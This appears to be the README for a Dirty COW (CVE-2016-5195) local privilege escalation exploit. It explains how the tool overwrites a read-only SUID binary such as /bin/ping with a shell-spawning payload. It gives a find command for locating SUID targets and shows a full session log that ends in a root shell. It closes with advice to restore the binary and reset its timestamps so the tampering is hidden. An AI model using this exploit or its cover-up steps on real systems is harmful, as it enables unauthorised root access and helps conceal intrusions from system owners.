I am not responsible for anything you do with this code. This code comes with no warranty.

Exploit for CVE-2016-5195 which maps a readonly SUID executable to memory (readonly) and uses the race condition to overwrite it with an ELF of our choice. Payloads are available in NASM format alongside the exploit code(cowshell-x86.asm && cowshell-x86_64.asm) if you wish to see what's inside cashm0ney.

Payload elevates with setuid(0), places 0 in vm.dirty_writeback_centisecs to prevent the crash due to filesystem writeback, and pops a shell(/bin/sh). This version does not attempt to write to /proc/self/mem, so it should be viable on CentOS/RHEL boxes. Still relies on ptrace, so it may fail if ptrace is restricted on the target system.

Find a root-owned SUID executable that your current user has at least read access to:

find / -type f -perm 4755

meow@dirtytest:~/Desktop$ ./derpyc0w /bin/ping /tmp/ping
[*] Opened /bin/ping
[*] Backing up /bin/ping to /tmp/ping
[*] File mapped at 0x0x7f0cbe7ce000
[*] Waiting for child to alert
[*] Starting madvise thread.
[*] Alerted by child.
[*] Preparing to write 262 bytes
[*] Trying to perform writes.
[*] Wrote byte to 0
[*] Wrote byte to 1
[*] Wrote byte to 2
[*] Wrote byte to 3
[*] Wrote byte to 4
[*] Wrote byte to 5
[*] Wrote byte to 6
[*] Wrote byte to 7
[*] Wrote byte to 8
SNIP
[*] Wrote byte to 259
[*] Wrote byte to 260
[*] Wrote byte to 261
[+] w00t, writes finished
[+] Popping shell. Remember to restore /bin/ping from /tmp/ping with correct perms!
# id
uid=0(root) gid=1000(meow) groups=1000(meow),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),131(sambashare)
# 

You should restore the binary which got overwritten to it's original path from the backup that was created, and remember to chown && chmod it back to the correct ownership and permissions. Touch the modification dates back for the trifecta.